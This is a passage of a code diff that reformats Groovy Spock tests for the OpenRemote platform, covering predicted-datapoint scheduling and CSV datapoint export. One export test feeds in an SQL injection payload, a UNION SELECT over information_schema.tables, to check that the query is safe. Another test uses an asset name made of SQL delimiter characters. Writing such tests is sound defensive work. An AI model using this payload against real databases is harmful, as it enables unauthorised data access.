-        setupScheduler(applyService)
+    then: "the deletion event is observed"
+    conditions.eventually {
+      assert events.any { it.ref == attributeRef && it.deleted }
+    }
 
-        and: "we capture attribute events"
-        List<AttributeEvent> events = new CopyOnWriteArrayList<>()
-        Consumer<AttributeEvent> consumer = { event -> events.add(event) }
-        clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+    when: "we clear events and advance time past all datapoints"
+    events.clear()
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
+    }
 
-        and: "an attribute with the required meta is created in a single update"
-        def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue10")
+    then: "the scheduled prediction for the attribute is cancelled"
+    conditions.eventually {
+      assert !applyService.scheduledEntries.containsKey(attributeRef)
+    }
 
-        and: "the creation event has been delivered to the service before it is observed here"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS) }
-        }
-        events.clear()
+    and: "no further non-deletion attribute events are emitted for the attribute"
+    assert !events.any { it.ref == attributeRef && !it.deleted }
+  }
 
-        and: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+  def "Does not emit attribute events after asset deletion"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
+
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
+
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
+
+    and: "we capture attribute events"
+    List<AttributeEvent> events = new CopyOnWriteArrayList<>()
+    Consumer<AttributeEvent> consumer = { event -> events.add(event) }
+    clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+
+    and: "an attribute with the required meta is created in a single update"
+    def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue10")
+
+    and: "the creation event has been delivered to the service before it is observed here"
+    conditions.eventually {
+      assert events.any {
+        it.ref == attributeRef && it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS)
+      }
+    }
+    events.clear()
+
+    and: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(3), 30d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(3), 30d)
             ]
-        )
+            )
 
-        when: "time advances to the middle of the predicted datapoints"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "an attribute event should have been emitted for the applied value"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.value.orElse(null) == 10d }
-        }
-
-        when: "the asset is deleted"
-        assetStorageService.delete(List.of(attributeRef.getId()))
-
-        then: "the deletion event is observed"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.deleted }
-        }
-
-        when: "we clear events and advance time past all datapoints"
-        events.clear()
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "the scheduled prediction for the attribute is cancelled"
-        conditions.eventually {
-            assert !applyService.scheduledEntries.containsKey(attributeRef)
-        }
-
-        and: "no further non-deletion attribute events are emitted for the attribute"
-        assert !events.any { it.ref == attributeRef && !it.deleted }
+    when: "time advances to the middle of the predicted datapoints"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
     }
 
-    private static void enablePredictedApplyMeta(AssetStorageService assetStorageService, String assetId, String attributeName) {
-        def asset = assetStorageService.find(assetId)
-        def attribute = asset.getAttribute(attributeName).get()
-        attribute.addOrReplaceMeta(
+    then: "an attribute event should have been emitted for the applied value"
+    conditions.eventually {
+      assert events.any { it.ref == attributeRef && it.value.orElse(null) == 10d }
+    }
+
+    when: "the asset is deleted"
+    assetStorageService.delete(List.of(attributeRef.getId()))
+
+    then: "the deletion event is observed"
+    conditions.eventually {
+      assert events.any { it.ref == attributeRef && it.deleted }
+    }
+
+    when: "we clear events and advance time past all datapoints"
+    events.clear()
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
+    }
+
+    then: "the scheduled prediction for the attribute is cancelled"
+    conditions.eventually {
+      assert !applyService.scheduledEntries.containsKey(attributeRef)
+    }
+
+    and: "no further non-deletion attribute events are emitted for the attribute"
+    assert !events.any { it.ref == attributeRef && !it.deleted }
+  }
+
+  private static void enablePredictedApplyMeta(AssetStorageService assetStorageService, String assetId, String attributeName) {
+    def asset = assetStorageService.find(assetId)
+    def attribute = asset.getAttribute(attributeName).get()
+    attribute.addOrReplaceMeta(
             new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true),
             new MetaItem<>(APPLY_PREDICTED_DATA_POINTS, true)
-        )
-        assetStorageService.merge(asset)
-    }
+            )
+    assetStorageService.merge(asset)
+  }
 
-    private static AttributeRef createTestAttribute(AssetStorageService assetStorageService, String assetId, String attributeName) {
-        def asset = assetStorageService.find(assetId)
-        asset.getAttributes().addOrReplace(
+  private static AttributeRef createTestAttribute(AssetStorageService assetStorageService, String assetId, String attributeName) {
+    def asset = assetStorageService.find(assetId)
+    asset.getAttributes().addOrReplace(
             new org.openremote.model.attribute.Attribute<>(attributeName, ValueType.NUMBER, 0d)
-        )
-        assetStorageService.merge(asset)
-        return new AttributeRef(assetId, attributeName)
-    }
+            )
+    assetStorageService.merge(asset)
+    return new AttributeRef(assetId, attributeName)
+  }
 
-    private static AttributeRef createTestAttributeWithApplyMeta(AssetStorageService assetStorageService, String assetId, String attributeName) {
-        def asset = assetStorageService.find(assetId)
-        def attribute = new Attribute<>(attributeName, ValueType.NUMBER, 0d)
-        attribute.addOrReplaceMeta(
+  private static AttributeRef createTestAttributeWithApplyMeta(AssetStorageService assetStorageService, String assetId, String attributeName) {
+    def asset = assetStorageService.find(assetId)
+    def attribute = new Attribute<>(attributeName, ValueType.NUMBER, 0d)
+    attribute.addOrReplaceMeta(
             new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true),
             new MetaItem<>(APPLY_PREDICTED_DATA_POINTS, true)
-        )
-        asset.getAttributes().addOrReplace(attribute)
-        assetStorageService.merge(asset)
-        return new AttributeRef(assetId, attributeName)
+            )
+    asset.getAttributes().addOrReplace(attribute)
+    assetStorageService.merge(asset)
+    return new AttributeRef(assetId, attributeName)
+  }
+
+  private static void addMeta(AssetStorageService assetStorageService, AttributeRef attributeRef, MetaItem<?> metaItem) {
+    def asset = assetStorageService.find(attributeRef.getId())
+    def attribute = asset.getAttribute(attributeRef.getName()).get()
+    attribute.addOrReplaceMeta(metaItem)
+    assetStorageService.merge(asset)
+  }
+
+  private static void removeMeta(AssetStorageService assetStorageService, AttributeRef attributeRef, def metaType) {
+    def asset = assetStorageService.find(attributeRef.getId())
+    def attribute = asset.getAttribute(attributeRef.getName()).get()
+    attribute.getMeta().remove(metaType)
+    assetStorageService.merge(asset)
+  }
+
+  private void setupScheduler(ApplyPredictedDataPointsService applyService) {
+    mockedApplyService = applyService
+    originalExecutor = applyService.scheduledExecutorService
+    def executor = Mock(ScheduledExecutorService)
+    scheduled = null
+
+    executor.schedule(_ as Runnable, _ as Long, _ as TimeUnit) >> { args ->
+      def scheduledFuture = Mock(ScheduledFuture)
+      scheduledFuture.get() >> {
+        (args[0] as Runnable).run()
+        return true
+      }
+      // Published only once the future is stubbed, so awaiting a schedule also awaits its future
+      scheduled = [delay: args[1] as Long, future: scheduledFuture]
+      return scheduledFuture
     }
 
-    private static void addMeta(AssetStorageService assetStorageService, AttributeRef attributeRef, MetaItem<?> metaItem) {
-        def asset = assetStorageService.find(attributeRef.getId())
-        def attribute = asset.getAttribute(attributeRef.getName()).get()
-        attribute.addOrReplaceMeta(metaItem)
-        assetStorageService.merge(asset)
+    synchronized (applyService.scheduleLock) {
+      applyService.scheduledFuture?.cancel(true)
+      applyService.scheduledFuture = null
+      applyService.scheduledExecutorService = executor
     }
+  }
 
-    private static void removeMeta(AssetStorageService assetStorageService, AttributeRef attributeRef, def metaType) {
-        def asset = assetStorageService.find(attributeRef.getId())
-        def attribute = asset.getAttribute(attributeRef.getName()).get()
-        attribute.getMeta().remove(metaType)
-        assetStorageService.merge(asset)
+  /**
+   * The service schedules on a container thread in response to events, so the schedule must be awaited before the
+   * clock is advanced; without this the test can resolve a future from an earlier schedule, or none at all.
+   */
+  private void awaitScheduled(ApplyPredictedDataPointsService applyService, AttributeRef attributeRef, PollingConditions conditions) {
+    conditions.eventually {
+      assert isScheduled(applyService, attributeRef)
+      assert scheduled != null
     }
+  }
 
-    private void setupScheduler(ApplyPredictedDataPointsService applyService) {
-        mockedApplyService = applyService
-        originalExecutor = applyService.scheduledExecutorService
-        def executor = Mock(ScheduledExecutorService)
-        scheduled = null
-
-        executor.schedule(_ as Runnable, _ as Long, _ as TimeUnit) >> { args ->
-            def scheduledFuture = Mock(ScheduledFuture)
-            scheduledFuture.get() >> {
-                (args[0] as Runnable).run()
-                return true
-            }
-            // Published only once the future is stubbed, so awaiting a schedule also awaits its future
-            scheduled = [delay: args[1] as Long, future: scheduledFuture]
-            return scheduledFuture
-        }
-
-        synchronized (applyService.scheduleLock) {
-            applyService.scheduledFuture?.cancel(true)
-            applyService.scheduledFuture = null
-            applyService.scheduledExecutorService = executor
-        }
+  private static boolean isScheduled(ApplyPredictedDataPointsService applyService, AttributeRef attributeRef) {
+    synchronized (applyService.scheduleLock) {
+      return applyService.scheduledEntries.containsKey(attributeRef)
     }
-
-    /**
-     * The service schedules on a container thread in response to events, so the schedule must be awaited before the
-     * clock is advanced; without this the test can resolve a future from an earlier schedule, or none at all.
-     */
-    private void awaitScheduled(ApplyPredictedDataPointsService applyService, AttributeRef attributeRef, PollingConditions conditions) {
-        conditions.eventually {
-            assert isScheduled(applyService, attributeRef)
-            assert scheduled != null
-        }
-    }
-
-    private static boolean isScheduled(ApplyPredictedDataPointsService applyService, AttributeRef attributeRef) {
-        synchronized (applyService.scheduleLock) {
-            return applyService.scheduledEntries.containsKey(attributeRef)
-        }
-    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetDatapointExportTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetDatapointExportTest.groovy
@@ -48,524 +48,529 @@ import static org.openremote.model.value.ValueType.NUMBER
 
 class AssetDatapointExportTest extends Specification implements ManagerContainerTrait {
 
-    // Important for test is that we use a different TZ for DB than for JVM
-    private static final String EXPORT_TEST_DATABASE_TIME_ZONE = ZoneId.systemDefault().id == "Europe/Amsterdam" ? "UTC" : "Europe/Amsterdam"
-    private static final int EXPORT_TEST_DATABASE_POOL_SIZE = 5
+  // Important for test is that we use a different TZ for DB than for JVM
+  private static final String EXPORT_TEST_DATABASE_TIME_ZONE = ZoneId.systemDefault().id == "Europe/Amsterdam" ? "UTC" : "Europe/Amsterdam"
+  private static final int EXPORT_TEST_DATABASE_POOL_SIZE = 5
 
-    def "Test CSV export functionality for asset data points"() {
+  def "Test CSV export functionality for asset data points"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started with a bounded DB connection pool"
-        def config = defaultConfig()
-        config.put(PersistenceService.OR_DB_POOL_MIN_SIZE, Integer.toString(EXPORT_TEST_DATABASE_POOL_SIZE))
-        config.put(PersistenceService.OR_DB_POOL_MAX_SIZE, Integer.toString(EXPORT_TEST_DATABASE_POOL_SIZE))
-        def container = startContainer(config, defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        def persistenceService = container.getService(PersistenceService.class)
-        setDatabaseSessionTimeZone(persistenceService, EXPORT_TEST_DATABASE_TIME_ZONE, EXPORT_TEST_DATABASE_POOL_SIZE)
-        assetDatapointService.datapointExportLimit = 1000
+    and: "the container is started with a bounded DB connection pool"
+    def config = defaultConfig()
+    config.put(PersistenceService.OR_DB_POOL_MIN_SIZE, Integer.toString(EXPORT_TEST_DATABASE_POOL_SIZE))
+    config.put(PersistenceService.OR_DB_POOL_MAX_SIZE, Integer.toString(EXPORT_TEST_DATABASE_POOL_SIZE))
+    def container = startContainer(config, defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    def persistenceService = container.getService(PersistenceService.class)
+    setDatabaseSessionTimeZone(persistenceService, EXPORT_TEST_DATABASE_TIME_ZONE, EXPORT_TEST_DATABASE_POOL_SIZE)
+    assetDatapointService.datapointExportLimit = 1000
 
-        and: "the database session timezone is different from the JVM timezone"
-        assert getDatabaseSessionTimeZone(persistenceService) == EXPORT_TEST_DATABASE_TIME_ZONE
-        assert ZoneId.systemDefault() != ZoneId.of(EXPORT_TEST_DATABASE_TIME_ZONE)
+    and: "the database session timezone is different from the JVM timezone"
+    assert getDatabaseSessionTimeZone(persistenceService) == EXPORT_TEST_DATABASE_TIME_ZONE
+    assert ZoneId.systemDefault() != ZoneId.of(EXPORT_TEST_DATABASE_TIME_ZONE)
 
-        when: "requesting the first light asset in City realm"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
+    when: "requesting the first light asset in City realm"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
 
-        then: "asset should exist and be correct"
-        def assetName = "Light 1"
-        def attributeName = "brightness"
-        def dateTime = LocalDateTime.now()
-        assert asset != null // light 1, 2 and 3
-        assert asset.name == assetName
-        assert asset.attributes.has(attributeName)
+    then: "asset should exist and be correct"
+    def assetName = "Light 1"
+    def attributeName = "brightness"
+    def dateTime = LocalDateTime.now()
+    assert asset != null // light 1, 2 and 3
+    assert asset.name == assetName
+    assert asset.attributes.has(attributeName)
 
-        and: "no datapoints should exist"
-        conditions.eventually {
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert datapoints.isEmpty()
-        }
-
-        /* ------------------------- */
-
-        when: "datapoints are added to the asset"
-        assetDatapointService.upsertValues(asset.getId(), attributeName,
-                [
-                        new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
-                ]
-        )
-
-        then: "the default CSV export should return a file"
-        def inputStream1 = assetDatapointService.exportDatapoints(
-                [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
-                dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        )
-
-        and: "the CSV export should contain all 5 data points"
-        def csvExport1Lines = inputStream1.readLines()
-        assert csvExport1Lines.size() == 6
-        assert csvExport1Lines[1].endsWith("10.0")
-        assert csvExport1Lines[2].endsWith("20.0")
-        assert csvExport1Lines[3].endsWith("30.0")
-        assert csvExport1Lines[4].endsWith("40.0")
-        assert csvExport1Lines[5].endsWith("50.0")
-
-        /* ------------------------- */
-
-        when: "exporting with format CSV_CROSSTAB"
-        def inputStream2 = assetDatapointService.exportDatapoints(
-                [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
-                dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                DatapointExportFormat.CSV_CROSSTAB
-        )
-
-        then: "the crosstab CSV export should contain all 5 data points in columnar format"
-        def csvExport2Lines = inputStream2.readLines()
-        assert csvExport2Lines.size() == 6 // header + 5 data rows
-        assert csvExport2Lines[0].contains("timestamp")
-        assert csvExport2Lines[0].contains(assetName + " : " + attributeName)
-
-        /* ------------------------- */
-
-        when: "exporting with format CSV_CROSSTAB_MINUTE"
-        def inputStream3 = assetDatapointService.exportDatapoints(
-                [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
-                dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                DatapointExportFormat.CSV_CROSSTAB_MINUTE
-        )
-
-        then: "the time-bucketed CSV export should contain aggregated data with correct values"
-        def csvExport3Lines = inputStream3.readLines()
-        assert csvExport3Lines.size() >= 2 // header + at least 1 aggregated row
-        assert csvExport3Lines[0].contains("timestamp")
-        assert csvExport3Lines[0].contains(assetName + " : " + attributeName)
-
-        and: "the aggregated values should be correct averages within 1-minute buckets"
-        // Each datapoint is 5 minutes apart, so each should be in its own 1-minute bucket
-        // Therefore we should have 5 rows of data (one per bucket)
-        assert csvExport3Lines.size() == 6 // header + 5 buckets
-
-        // Extract the values from the CSV (skip header, get last column which is the brightness value)
-        def values = csvExport3Lines[1..5].collect { line ->
-            def parts = line.split(',')
-            parts.size() > 1 ? parts[1].trim() : null
-        }.findAll { it != null && it != '' }
-
-        // Should have 5 values, one per bucket, matching our input: 10, 20, 30, 40, 50
-        assert values.size() == 5
-        assert values.contains("10.000") || values.contains("10")
-        assert values.contains("20.000") || values.contains("20")
-        assert values.contains("30.000") || values.contains("30")
-        assert values.contains("40.000") || values.contains("40")
-        assert values.contains("50.000") || values.contains("50")
-
-        /* ------------------------- */
-
-        when: "the limit of data export is lowered to 4"
-        assetDatapointService.datapointExportLimit = 4
-
-        and: "we try to export the same amount of data points"
-        def inputStream4 = assetDatapointService.exportDatapoints(
-                [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
-                dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        )
-
-        then: "the CSV export should throw an exception"
-        thrown(DatapointQueryTooLargeException)
-
-        /* ------------------------- */
-
-        cleanup: "Remove the limit on datapoint querying"
-        if (assetDatapointService != null) {
-            assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
-        }
-        if (persistenceService != null) {
-            setDatabaseSessionTimeZone(persistenceService, "UTC", EXPORT_TEST_DATABASE_POOL_SIZE)
-        }
+    and: "no datapoints should exist"
+    conditions.eventually {
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert datapoints.isEmpty()
     }
 
-    def "Export query is not vulnerable to SQL injection via attributeRefs"() {
+    /* ------------------------- */
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "datapoints are added to the asset"
+    assetDatapointService.upsertValues(asset.getId(), attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
+              new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
+              new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
+              new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
+              new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
+            ]
+            )
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
+    then: "the default CSV export should return a file"
+    def inputStream1 = assetDatapointService.exportDatapoints(
+            [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
+            dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+            )
 
-        and: "ensure there are no datapoints"
-        assetDatapointService.purgeDataPoints()
+    and: "the CSV export should contain all 5 data points"
+    def csvExport1Lines = inputStream1.readLines()
+    assert csvExport1Lines.size() == 6
+    assert csvExport1Lines[1].endsWith("10.0")
+    assert csvExport1Lines[2].endsWith("20.0")
+    assert csvExport1Lines[3].endsWith("30.0")
+    assert csvExport1Lines[4].endsWith("40.0")
+    assert csvExport1Lines[5].endsWith("50.0")
 
-        when: "requesting the first light asset in City realm"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
+    /* ------------------------- */
 
-        then: "asset should exist and be correct"
-        assert asset != null
+    when: "exporting with format CSV_CROSSTAB"
+    def inputStream2 = assetDatapointService.exportDatapoints(
+            [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
+            dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            DatapointExportFormat.CSV_CROSSTAB
+            )
 
-        when: "exporting with a malicious attribute name"
-        def injectedAttributeName = "x')) UNION ((SELECT now()::timestamp, table_name::text, 'injected'::text, NULL::jsonb FROM information_schema.tables WHERE table_schema='public"
-        def csvExport = assetDatapointService.exportDatapoints(
-                [new AttributeRef(asset.id, injectedAttributeName)] as AttributeRef[],
-                LocalDateTime.now().minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                LocalDateTime.now().atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        )
+    then: "the crosstab CSV export should contain all 5 data points in columnar format"
+    def csvExport2Lines = inputStream2.readLines()
+    assert csvExport2Lines.size() == 6 // header + 5 data rows
+    assert csvExport2Lines[0].contains("timestamp")
+    assert csvExport2Lines[0].contains(assetName + " : " + attributeName)
 
-        then: "the CSV export should not contain injected rows"
-        assert csvExport != null
-        def csvExportLines = csvExport.readLines()
-        assert csvExportLines.size() == 1
+    /* ------------------------- */
+
+    when: "exporting with format CSV_CROSSTAB_MINUTE"
+    def inputStream3 = assetDatapointService.exportDatapoints(
+            [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
+            dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            DatapointExportFormat.CSV_CROSSTAB_MINUTE
+            )
+
+    then: "the time-bucketed CSV export should contain aggregated data with correct values"
+    def csvExport3Lines = inputStream3.readLines()
+    assert csvExport3Lines.size() >= 2 // header + at least 1 aggregated row
+    assert csvExport3Lines[0].contains("timestamp")
+    assert csvExport3Lines[0].contains(assetName + " : " + attributeName)
+
+    and: "the aggregated values should be correct averages within 1-minute buckets"
+    // Each datapoint is 5 minutes apart, so each should be in its own 1-minute bucket
+    // Therefore we should have 5 rows of data (one per bucket)
+    assert csvExport3Lines.size() == 6 // header + 5 buckets
+
+    // Extract the values from the CSV (skip header, get last column which is the brightness value)
+    def values = csvExport3Lines[1..5].collect { line ->
+      def parts = line.split(',')
+      parts.size() > 1 ? parts[1].trim() : null
+    }.findAll { it != null && it != '' }
+
+    // Should have 5 values, one per bucket, matching our input: 10, 20, 30, 40, 50
+    assert values.size() == 5
+    assert values.contains("10.000") || values.contains("10")
+    assert values.contains("20.000") || values.contains("20")
+    assert values.contains("30.000") || values.contains("30")
+    assert values.contains("40.000") || values.contains("40")
+    assert values.contains("50.000") || values.contains("50")
+
+    /* ------------------------- */
+
+    when: "the limit of data export is lowered to 4"
+    assetDatapointService.datapointExportLimit = 4
+
+    and: "we try to export the same amount of data points"
+    def inputStream4 = assetDatapointService.exportDatapoints(
+            [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
+            dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+            )
+
+    then: "the CSV export should throw an exception"
+    thrown(DatapointQueryTooLargeException)
+
+    /* ------------------------- */
+
+    cleanup: "Remove the limit on datapoint querying"
+    if (assetDatapointService != null) {
+      assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
+    }
+    if (persistenceService != null) {
+      setDatabaseSessionTimeZone(persistenceService, "UTC", EXPORT_TEST_DATABASE_POOL_SIZE)
+    }
+  }
+
+  def "Export query is not vulnerable to SQL injection via attributeRefs"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+
+    and: "ensure there are no datapoints"
+    assetDatapointService.purgeDataPoints()
+
+    when: "requesting the first light asset in City realm"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
+
+    then: "asset should exist and be correct"
+    assert asset != null
+
+    when: "exporting with a malicious attribute name"
+    def injectedAttributeName = "x')) UNION ((SELECT now()::timestamp, table_name::text, 'injected'::text, NULL::jsonb FROM information_schema.tables WHERE table_schema='public"
+    def csvExport = assetDatapointService.exportDatapoints(
+            [new AttributeRef(asset.id, injectedAttributeName)] as AttributeRef[],
+            LocalDateTime.now().minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+            LocalDateTime.now().atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+            )
+
+    then: "the CSV export should not contain injected rows"
+    assert csvExport != null
+    def csvExportLines = csvExport.readLines()
+    assert csvExportLines.size() == 1
+  }
+
+  def "Crosstab exports treat asset names with SQL delimiters as CSV labels"() {
+
+    given: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.datapointExportLimit = 10000
+
+    and: "ensure there are no datapoints"
+    assetDatapointService.purgeDataPoints()
+
+    and: "an asset name contains SQL delimiter syntax"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
+    assert asset != null
+    def originalName = asset.name
+    def maliciousAssetName = 'SQL "delimiter" $cat$ -- label'
+    def attributeName = "brightness"
+    asset.name = maliciousAssetName
+    asset = assetStorageService.merge(asset)
+
+    and: "the asset has one datapoint for a real exported attribute"
+    def dateTime = LocalDateTime.now()
+    assetDatapointService.upsertValues(
+            asset.getId(),
+            attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)
+            ]
+            )
+
+    expect: "both crosstab formats export the datapoint without treating the asset name as SQL"
+    [DatapointExportFormat.CSV_CROSSTAB, DatapointExportFormat.CSV_CROSSTAB_MINUTE].each { format ->
+      def csvExport = assetDatapointService.exportDatapoints(
+      [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
+      dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+      dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
+      format
+      ).getText(StandardCharsets.UTF_8.name())
+      def csvExportLines = csvExport.readLines()
+
+      assert csvExportLines.size() == 2
+      assert parseCsvLine(csvExportLines[0]) == ["timestamp", maliciousAssetName + " : " + attributeName]
+      assert csvExportLines[1].contains("42")
     }
 
-    def "Crosstab exports treat asset names with SQL delimiters as CSV labels"() {
-
-        given: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
